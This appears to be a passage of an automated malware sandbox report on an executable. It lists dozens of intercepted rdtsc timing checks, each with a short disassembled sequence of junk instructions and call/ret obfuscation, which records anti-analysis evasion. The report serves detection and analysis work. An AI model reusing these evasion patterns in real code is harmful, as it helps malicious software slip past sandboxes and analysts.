Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E324B second address: 4E3250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E346A second address: 4E34ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3603h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b call 00007F5BC10A3601h 0x00000010 mov dword ptr [ebp+122D1BF1h], esi 0x00000016 pop esi 0x00000017 push 00000000h 0x00000019 clc 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007F5BC10A35F8h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 0000001Ch 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 add dword ptr [ebp+12482E29h], eax 0x0000003c pushad 0x0000003d movzx eax, si 0x00000040 push ecx 0x00000041 xor eax, 3A6EABC3h 0x00000047 pop edi 0x00000048 popad 0x00000049 xchg eax, ebx 0x0000004a jmp 00007F5BC10A35FAh 0x0000004f push eax 0x00000050 jbe 00007F5BC10A3600h 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E3FD2 second address: 4E3FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E8EF4 second address: 4E8EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E94F3 second address: 4E950C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F5BC10B7098h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F5BC10B709Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E950C second address: 4E9510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E522E second address: 4E5232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4EA7AB second address: 4EA7D1 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5BC10A3607h 0x00000008 jmp 00007F5BC10A3601h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F5BC10A35F8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4EA7D1 second address: 4EA83D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5BC10B7098h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov di, bx 0x0000000e push dword ptr fs:[00000000h] 0x00000015 jp 00007F5BC10B7096h 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 jmp 00007F5BC10B709Eh 0x00000027 mov eax, dword ptr [ebp+122D1721h] 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F5BC10B7098h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 00000015h 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 add dword ptr [ebp+1247BFE9h], edx 0x0000004d push FFFFFFFFh 0x0000004f sub bx, 5077h 0x00000054 nop 0x00000055 jnl 00007F5BC10B70A4h 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4EA83D second address: 4EA843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4EB945 second address: 4EB94A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4EA843 second address: 4EA84E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4EC918 second address: 4EC91C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4ED760 second address: 4ED765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4ED765 second address: 4ED7AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F5BC10B7096h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push ebx 0x00000012 mov dword ptr [ebp+12452B7Ah], edi 0x00000018 pop edi 0x00000019 mov dword ptr [ebp+122D19AAh], eax 0x0000001f push 00000000h 0x00000021 or dword ptr [ebp+1245E0D7h], edx 0x00000027 push 00000000h 0x00000029 mov edi, 64DA5EC1h 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 push eax 0x00000031 pushad 0x00000032 popad 0x00000033 pop eax 0x00000034 pushad 0x00000035 jns 00007F5BC10B7096h 0x0000003b push eax 0x0000003c pop eax 0x0000003d popad 0x0000003e popad 0x0000003f push eax 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 jl 00007F5BC10B7096h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4ED95B second address: 4ED968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F5BC10A35F6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4F0734 second address: 4F073E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F5BC10B7096h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4F073E second address: 4F0762 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F5BC10A3605h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4F3710 second address: 4F3715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4F0822 second address: 4F0826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4F3715 second address: 4F37B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnl 00007F5BC10B70A9h 0x00000010 nop 0x00000011 mov dword ptr [ebp+122D1A84h], edx 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F5BC10B7098h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D1BECh], edx 0x00000039 mov bx, dx 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ebp 0x00000041 call 00007F5BC10B7098h 0x00000046 pop ebp 0x00000047 mov dword ptr [esp+04h], ebp 0x0000004b add dword ptr [esp+04h], 00000016h 0x00000053 inc ebp 0x00000054 push ebp 0x00000055 ret 0x00000056 pop ebp 0x00000057 ret 0x00000058 movzx edi, dx 0x0000005b mov bl, 7Ch 0x0000005d xchg eax, esi 0x0000005e jmp 00007F5BC10B709Fh 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 push ecx 0x00000069 pop ecx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4F0826 second address: 4F082A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4F37B8 second address: 4F37BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4F280B second address: 4F2813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4F5A7B second address: 4F5A7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4F7806 second address: 4F781A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5BC10A35FFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4F5A7F second address: 4F5A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4F781A second address: 4F7835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F5BC10A3601h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4F86E5 second address: 4F86F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F5BC10B7096h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4F86F0 second address: 4F8706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5BC10A35FCh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4954F1 second address: 495509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10B709Eh 0x00000009 ja 00007F5BC10B7096h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50106A second address: 501076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5BC10A35F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 501076 second address: 50107D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50107D second address: 5010A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F5BC10A35FAh 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 je 00007F5BC10A35F6h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push edi 0x0000001c pushad 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 501398 second address: 50139C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 505BB2 second address: 505BB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 505BB8 second address: 505BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 505BBC second address: 505BC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 505C63 second address: 505C67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 505CAE second address: 505CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50A1EA second address: 50A1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50A8E7 second address: 50A905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007F5BC10A3607h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50ACD3 second address: 50ACD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50ACD7 second address: 50AD12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5BC10A3608h 0x0000000b push eax 0x0000000c pushad 0x0000000d jo 00007F5BC10A35F6h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jmp 00007F5BC10A35FCh 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50AD12 second address: 50AD16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50AEB5 second address: 50AEB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B035 second address: 50B05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jmp 00007F5BC10B70A4h 0x0000000c pushad 0x0000000d jns 00007F5BC10B7096h 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B05D second address: 50B065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B065 second address: 50B06B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B1A8 second address: 50B1AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B1AC second address: 50B1B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B317 second address: 50B334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5BC10A3602h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50FAB4 second address: 50FAB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50FAB8 second address: 50FABE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50FABE second address: 50FAC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50FAC4 second address: 50FACC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50FACC second address: 50FAD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4A1111 second address: 4A114D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F5BC10A3646h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5BC10A3604h 0x00000017 jmp 00007F5BC10A3606h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4A114D second address: 4A1161 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5BC10B7096h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F5BC10B7096h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4A1161 second address: 4A116B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5BC10A35F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E737F second address: 4E7383 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E7383 second address: 4E738C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E738C second address: 4E73D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 adc edi, 53C36F93h 0x0000000f lea eax, dword ptr [ebp+1248C0BAh] 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F5BC10B7098h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f cld 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 js 00007F5BC10B7098h 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E7893 second address: 4E7899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E7A90 second address: 4E7AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 ja 00007F5BC10B7096h 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jns 00007F5BC10B7096h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E7AAB second address: 4E7B11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f jmp 00007F5BC10A3604h 0x00000014 jmp 00007F5BC10A3605h 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c push ecx 0x0000001d jmp 00007F5BC10A35FBh 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F5BC10A3608h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E83B3 second address: 4E83BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E86A4 second address: 4E86A9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E86A9 second address: 4E86B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E86B9 second address: 4E86BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E86BD second address: 4E86C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 4E8737 second address: 4E873B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50F248 second address: 50F24D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50F24D second address: 50F252 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50F252 second address: 50F258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50F3DC second address: 50F3E2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50F682 second address: 50F68A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 518A18 second address: 518A3F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5BC10A35F6h 0x00000008 je 00007F5BC10A35F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jg 00007F5BC10A3607h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 517457 second address: 51745B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 517D17 second address: 517D2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F5BC10A35F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d pushad 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 517D2C second address: 517D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 518158 second address: 51815C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 51815C second address: 518164 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 518164 second address: 518169 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
